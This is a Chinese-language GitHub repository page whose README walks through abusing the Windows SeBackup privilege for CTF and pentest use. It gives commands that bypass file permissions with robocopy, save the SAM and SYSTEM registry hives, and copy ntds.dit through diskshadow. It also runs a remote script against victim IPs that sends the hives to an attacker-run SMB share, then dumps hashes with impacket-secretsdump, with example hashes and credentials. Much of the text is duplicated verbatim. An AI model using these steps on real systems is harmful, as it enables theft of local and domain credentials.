PiyushThePal/SeBackup-Privilege
GitHub: PiyushThePal/SeBackup-Privilege
演示如何在 Windows 环境中滥用 SeBackup 权限提取敏感文件和凭据的脚本与说明。
Stars: 5 | Forks: 0
# SeBackup 权限滥用
本仓库包含一个脚本和说明,用于演示在 Windows 环境中滥用 SeBackup 权限。SeBackup 权限允许用户绕过文件权限并复制文件,这可以被用来获取敏感信息。
## 描述
提供的脚本演示了如何:
1. 从管理员的桌面检索文件(直接获取 CTF 的 root flag)。
2. 复制 SAM 和 SYSTEM 文件以导出本地哈希。
3. 生成包含 Active Directory 数据库的 ntds.dit 文件,以导出域哈希。
4. 从本地机器远程利用 SeBackup 权限。
## 用法
### 前置条件
执行该脚本的用户已启用 SeBackupPrivilege。
## 在本地利用该权限的步骤和方法
### ---> 从管理员的桌面检索文件(直接获取 CTF 的 root flag)
使用带有 /b 开关的 robocopy 命令来绕过文件权限,并从管理员的桌面复制文件。
`robocopy /b C:\Users\Administrator\Desktop\ C:\`
### ---> 复制 SAM 和 SYSTEM 文件以导出本地哈希
使用 reg 命令将 SAM 和 SYSTEM 文件保存在当前工作目录(PWD)中。
`reg save hklm\sam sam`
`reg save hklm\system system` ### ---> 生成包含 Active Directory 数据库的 ntds.dit 文件,以导出域哈希 下载并将 `script.txt` 文件移动到 Windows 机器上: 使用准备好的脚本执行 Diskshadow 实用程序,并再次使用 robocopy 将 ntds.dit 文件复制到当前工作目录(PWD): `diskshadow /s script.txt`
`robocopy /b E:\Windows\ntds . ntds.dit`
## 远程利用该权限的步骤 * 将此 Python 脚本克隆到您的本地机器: `git clone https://github.com/horizon3ai/backup_dc_registry` * 在运行脚本之前,请在本地机器上启动一个 SMB 服务器: `impacket-smbserver test . -smb2support` * 使用密码或哈希值并通过以下命令运行脚本: `python3 reg.py username:password@victim_ip backup -p '\\your_local_ip\test'`
`python3 reg.py username@victim_ip -hashes aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d backup -p '\\your_local_ip\test'` 示例: `python3 reg.py jsmith:'Spring2021'@10.0.229.1 backup -p '\\10.0.220.51\share'`
`python3 reg.py svc_backup@10.10.10.192 -hashes aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d backup -p '\\10.10.14.2\test'` * 使用 `impacket-secretsdump` 导出凭据: `impacket-secretsdump LOCAL -system share/SYSTEM -security test/SECURITY -sam test/SAM` ## 免责声明 此脚本仅用于教育目的。未经授权访问计算机系统是非法且不道德的。请仅在您拥有或已获得明确测试授权的系统上使用此脚本。 ## 贡献 如果您有任何改进或建议,请随时提交 Pull Request 或开启 Issue。
`reg save hklm\system system` ### ---> 生成包含 Active Directory 数据库的 ntds.dit 文件,以导出域哈希 下载并将 `script.txt` 文件移动到 Windows 机器上: 使用准备好的脚本执行 Diskshadow 实用程序,并再次使用 robocopy 将 ntds.dit 文件复制到当前工作目录(PWD): `diskshadow /s script.txt`
`robocopy /b E:\Windows\ntds . ntds.dit`
## 远程利用该权限的步骤 * 将此 Python 脚本克隆到您的本地机器: `git clone https://github.com/horizon3ai/backup_dc_registry` * 在运行脚本之前,请在本地机器上启动一个 SMB 服务器: `impacket-smbserver test . -smb2support` * 使用密码或哈希值并通过以下命令运行脚本: `python3 reg.py username:password@victim_ip backup -p '\\your_local_ip\test'`
`python3 reg.py username@victim_ip -hashes aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d backup -p '\\your_local_ip\test'` 示例: `python3 reg.py jsmith:'Spring2021'@10.0.229.1 backup -p '\\10.0.220.51\share'`
`python3 reg.py svc_backup@10.10.10.192 -hashes aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d backup -p '\\10.10.14.2\test'` * 使用 `impacket-secretsdump` 导出凭据: `impacket-secretsdump LOCAL -system share/SYSTEM -security test/SECURITY -sam test/SAM` ## 免责声明 此脚本仅用于教育目的。未经授权访问计算机系统是非法且不道德的。请仅在您拥有或已获得明确测试授权的系统上使用此脚本。 ## 贡献 如果您有任何改进或建议,请随时提交 Pull Request 或开启 Issue。
标签:Active Directory攻击, Diskshadow, Impacket, NTDS.dit导出, Robocopy绕过, SAM数据库, SeBackup特权滥用, SMB服务, Windows提权, 凭据窃取, 协议分析, 哈希转储, 域渗透, 数据展示, 本地提权, 权限提升, 电子数据取证, 红队, 网络安全, 远程利用, 逆向工具, 隐私保护